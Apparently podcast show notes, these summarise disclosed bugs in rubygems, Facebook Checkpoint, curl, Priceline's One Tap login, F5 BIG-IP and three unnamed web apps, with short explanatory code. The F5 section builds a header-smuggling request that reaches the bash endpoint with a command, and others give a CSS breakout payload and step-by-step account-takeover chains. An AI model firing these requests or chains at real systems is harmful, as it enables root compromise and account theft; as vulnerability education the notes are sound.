Show Notes

145 - Yanking Rubygems, BIG-IP Auth Bypass, and a Priceline Account Takeover

Interesting but fairly simple vuln in rubygems. It’s a design flaw or logic bug in the way versioning works when yanking a gem. You’re only supposed to be able to yank a gem that you / your API key has ownership over, for obvious reasons. The problem is, rubygems would use a user-provided slug for the version of the package, and it didn’t account for the fact that a user could intentionally craft the slug to collide with a different package’s name.

The example they give: an attacker owns a package called rails-html, and a victim package rails-html-sanitizer exists. By supplying the version slug sanitizer-1.4.2, the attacker’s gem name and the slug concatenate into rails-html-sanitizer-1.4.2, letting the attacker yank a version of a package they don’t own.
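The flawed lookup can be sketched in a few lines (illustrative Python; the function names and data layout are assumptions, not rubygems.org’s actual code):

```python
# Illustrative model of the vulnerable yank lookup (names are made up):
# the version to yank was found by concatenating the caller's gem name
# with a caller-supplied version slug, then searching by that "full name",
# without checking which gem the match actually belonged to.

def full_name(gem_name: str, slug: str) -> str:
    return f"{gem_name}-{slug}"

def find_version_to_yank(owned_gem: str, slug: str, all_versions: dict) -> dict:
    # all_versions maps "name-version" full names to version records
    return all_versions.get(full_name(owned_gem, slug))

all_versions = {
    "rails-html-1.0.0": {"gem": "rails-html", "version": "1.0.0"},
    "rails-html-sanitizer-1.4.2": {"gem": "rails-html-sanitizer", "version": "1.4.2"},
}

# Attacker owns "rails-html" but supplies the slug "sanitizer-1.4.2":
yanked = find_version_to_yank("rails-html", "sanitizer-1.4.2", all_versions)
print(yanked["gem"])  # rails-html-sanitizer -- a gem the attacker does not own
```

The missing ownership check on the matched record, not the concatenation itself, is the core of the bug.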

A chain of bugs starting with a “third party” information disclosure and leading to an account takeover. The third-party aspect can be argued, but as a vuln classification it feels like the best fit for the root of this issue.

Starting off, the issue is within Facebook’s Checkpoint system, kinda like a captive portal for a web application. Make any request to Facebook and it gets redirected to Checkpoint if the account is in a state requiring it, like MFA, temporary ban enforcement, or, for this issue, displaying a captcha before the user can continue to use Facebook.

On the captcha page, an iframe is loaded to display the captcha. This iframe’s URL points to Facebook’s Sandbox domain and has a referer parameter containing the URL of the page hosting the iframe. Checkpoint pages may include a next parameter indicating the original page the user tried to access (and where to go after the Checkpoint has been completed). This next parameter can leak potentially sensitive information: if, for example, a user were redirected to the Checkpoint in the middle of an OAuth flow, the code for that user may be exposed to the Facebook Sandbox.

Despite this cross-context leak, it is not yet usable by an attacker. They would still need a couple of things:

  1. They need to be able to read that URL somehow; neither the iframe nor the page loading it is under their control. To do this, the author started off by finding an XSS within the Facebook Sandbox domain. This was effectively a non-issue, as there was an intended feature for developers to upload HTML files and have them served within the sandbox. This places their malicious code in a similar context to the target information.

For this attack, you have an iframe with attacker-controlled JavaScript in the Facebook Sandbox on the same page as an iframe containing the Facebook Checkpoint. The attacker iframe can go through window.parent to reach the top page, then access its other iframe (the Checkpoint iframe) through frames. Since the captcha iframe inside that Checkpoint frame is on the same sandbox domain as the attacker’s frame, the attacker can read its location.href. I’ll admit this setup is a little bit confusing and I’m not 100% sure I’ve got it right, but the author got it to work, so trust the process I suppose.

  2. Most accounts will not be redirected to the Checkpoint system, so an attacker would need a way to target users and get them into the Checkpoint. For this, the fact that the Login and Logout systems were CSRF-able was used to log a victim out of their own account and into the attacker’s account, which would be in the Checkpoint state.

Putting everything together, you’ve got your attack page with two iframes: one pointing to the Facebook Sandbox, and the other we will call target.

  • Logout the victim using the Logout CSRF
  • Login the victim to an account that will be redirected to the Checkpoint using the Login CSRF
  • Have the target frame open the Google OAuth flow. – As the victim should have already approved the Facebook app, they should almost immediately be redirected back to the Facebook OAuth receiver with the code parameter.
  • Checkpoint will catch this request and redirect them.
  • The Checkpoint page will load the Facebook Sandbox iframe with the code as part of the referer parameter.
  • The attacker can then try to read the target.frames[0].location.href and get the code from the URL.

A nice little logic error abusing an edge case between two different command flags. Curl may remove the wrong file when the --no-clobber and --remove-on-error flags are used together. What happens is that --no-clobber tells curl not to overwrite an existing file, so if a file already exists it simply appends a number to the original file name. Later, if an error happens, --remove-on-error is not aware of the new filename and will attempt to remove the original filename that curl was trying not to clobber.
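The flag interaction can be sketched like this (an illustrative Python model of the behavior described above, not curl’s actual source):

```python
import os
import tempfile

def curl_like_download(path: str, fail: bool) -> str:
    """Illustrative model of the --no-clobber / --remove-on-error interaction."""
    actual, n = path, 1
    while os.path.exists(actual):      # --no-clobber: never overwrite,
        actual = f"{path}.{n}"         # append a number to the name instead
        n += 1
    with open(actual, "w") as f:
        f.write("partial download")
    if fail:
        os.remove(path)                # BUG: --remove-on-error deletes the
                                       # ORIGINAL name, not the file written
    return actual

with tempfile.TemporaryDirectory() as d:
    precious = os.path.join(d, "report.pdf")
    with open(precious, "w") as f:
        f.write("pre-existing file the user wanted to keep")
    written = curl_like_download(precious, fail=True)
    survived = os.path.exists(precious)
    partial = os.path.basename(written)

print(survived)  # False: the user's original file is gone
print(partial)   # report.pdf.1: the partial download is left behind
```

The net effect is exactly inverted from the user’s intent: the protected file is deleted and the failed partial download survives.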

An actual attack abusing this is hard to imagine, requiring a rather constrained situation to be exploited, but it is a great example of bugs that exist at the intersection of different features, creating problematic edge cases.

Authentication bug in Priceline through the use of Google One Tap. The problem is that they assumed emails provided through Google One Tap were verified and authentic. While this is true for regular Google authentication, One Tap expects you to check the email_verified field to ensure the email is valid, which Priceline didn’t. This made it possible for an attacker to register the domain of a victim’s email with G Suite (even without owning or verifying it) and log in to that account through One Tap.
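A minimal sketch of the missing check (the email_verified claim is part of Google’s ID token payload; the login handler and account store here are hypothetical):

```python
# The email_verified claim name is real (Google ID token payload);
# everything else here is a hypothetical illustration of the fix.

def login_from_one_tap(claims: dict, accounts: dict) -> dict:
    if not claims.get("email_verified"):
        # The check Priceline skipped: a Workspace admin for an unverified
        # domain can still mint tokens for addresses on it, so an address
        # must not be trusted for account linking until this is true.
        raise PermissionError("unverified email; refuse to link account")
    return accounts[claims["email"]]

accounts = {"victim@example.com": {"id": 42}}
forged = {"email": "victim@example.com", "email_verified": False}

try:
    login_from_one_tap(forged, accounts)
    outcome = "logged in"
except PermissionError:
    outcome = "rejected"
print(outcome)  # rejected
```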

Authentication bypass on the sensitive /mgmt/tm/util/bash endpoint which, as the name suggests, will take commands and execute them. The endpoint was protected by authentication, but that authentication was vulnerable to a kind of desync. F5 has a custom Apache module called mod_auth_pam, which would register a hook that checks request headers for an X-F5-Auth-Token header. If this was present, the request would be forwarded to the iControl REST service. If not, the Authorization header is checked, and if credentials don’t match the request is rejected. The iControl REST service will check to see if a token was given, and it’ll validate it if so. If no token was given, it continues onward, assuming the request was already authenticated.

The problem is, mod_auth_pam would check for X-F5-Auth-Token before the Connection header was processed. It was possible to sneak this header into a Connection header, get the request passed to the iControl REST service, and have the token dropped before it could be validated, hitting that edge-case where iControl assumes you’re authenticated. This gives command execution as root.
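A sketch of what such a smuggled request could look like (the header names come from the write-up; the host, body, and exact set of headers required in practice are assumptions):

```python
# Illustrative request shape only. Listing X-F5-Auth-Token in the
# Connection header makes Apache treat it as hop-by-hop and strip it
# before proxying -- after mod_auth_pam has already seen it and skipped
# the credential check, but before iControl REST can validate it.

body = '{"command": "run", "utilCmdArgs": "-c id"}'
request = (
    "POST /mgmt/tm/util/bash HTTP/1.1\r\n"
    "Host: target\r\n"
    "Connection: keep-alive, X-F5-Auth-Token\r\n"  # tells Apache to drop it
    "X-F5-Auth-Token: anything\r\n"                # satisfies the front-end hook
    "Content-Type: application/json\r\n"
    f"Content-Length: {len(body)}\r\n"
    "\r\n"
    + body
)
print(request.splitlines()[0])  # POST /mgmt/tm/util/bash HTTP/1.1
```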

Three bugs or chains of bugs that are typically the type to be thrown out or dismissed, but were exploitable in these cases with some tricks. All of these attacks were in undisclosed targets, though the general context is provided.

CSS Injection + Clickjacking

The first case was a site that allowed you to register a community under a subdomain, which you could stylize with custom theme colors and such. These choices were put into a stylesheet with no sanitization, so quotes could be used to break out and inject CSS. To exploit it, they took advantage of the fact that every community includes a settings page, which allows users to change global settings across communities (like their email). They used the CSS injection to turn that settings page into a ‘phishing’-style page with text saying “click here to view contents”, which would actually submit the change-email form with an attacker-controlled email address.
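A minimal sketch of the quote breakout, assuming a hypothetical template that drops the theme color into a quoted CSS value with no sanitization:

```python
# Hypothetical stylesheet template (not the real site's), illustrating
# how a quote in the "color" value escapes the rule and injects new CSS.

def render_theme_css(color: str) -> str:
    return f'.banner {{ background: "{color}"; }}'

# Close the quoted value and the rule, then inject attacker rules that
# restyle the settings page (e.g. making the change-email form invisible
# under a "click here" lure), with /* to comment out the trailing template.
payload = 'red"; } .settings-form { opacity: 0.01; } /*'
css = render_theme_css(payload)
print(css)
```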

Drag+Drop XSS + Cookie Bomb

The second case was an online photo editor which allowed drag-and-drop to upload photos. The problem is that it would run a jQuery selector on a textarea, take the decoded URL from the drag-and-drop, and pass it to html(), which could be XSS’d. At first this didn’t seem too useful, as there was an OAuth system but no state parameter / tracking going on. You could send a request to the login page and retrieve a token through the redirect, but that token would then get consumed and invalidated. The trick here was to use cookie bombing to create request headers that exceeded the server limit (8KB on Apache). In this case, you’d be able to get the token, but the victim’s request would fail, and thus the token wouldn’t get consumed before an attacker could use it.
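The cookie-bomb arithmetic is simple to sketch (the cookie names and sizes here are arbitrary; 8KB is the Apache limit mentioned above):

```python
# A few oversized cookies are enough to push the victim's request headers
# past the server's limit, so the redirect carrying the OAuth token fails
# server-side and the token is never consumed.

LIMIT = 8 * 1024                                   # Apache's default, per the write-up
cookies = [f"bomb{i}=" + "A" * 4000 for i in range(3)]
cookie_header = "Cookie: " + "; ".join(cookies)
oversized = len(cookie_header) > LIMIT
print(oversized)  # True
```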

Self XSS + Login/Logout CSRF

The final case was a blogging-type platform based on an old version of TinyMCE. This version had a known XSS in the editor. This seemed useless though, because it was only in the editor and it was a self-XSS. They were able to chain this with a CSRF in the login/logout functionality to make it more practical. While the regular login/logout had anti-CSRF tokens, Facebook OAuth didn’t. They could tamper with the state and log a victim into the attacker’s account through Facebook OAuth. This allowed the attacker to XSS the victim.

At this point this is still limited, as the victim would be logged into the attacker’s account and not their own. However, with XSS, they could then send a request in a new tab to log the victim back into their own account. This results in one tab where the attacker’s XSS is running in the attacker’s account, and a second tab where the victim is logged into their own account. Since both tabs are under the same origin, there’s no security isolation between them, and the attacker can change the email of the victim’s account from the other tab and take over the account.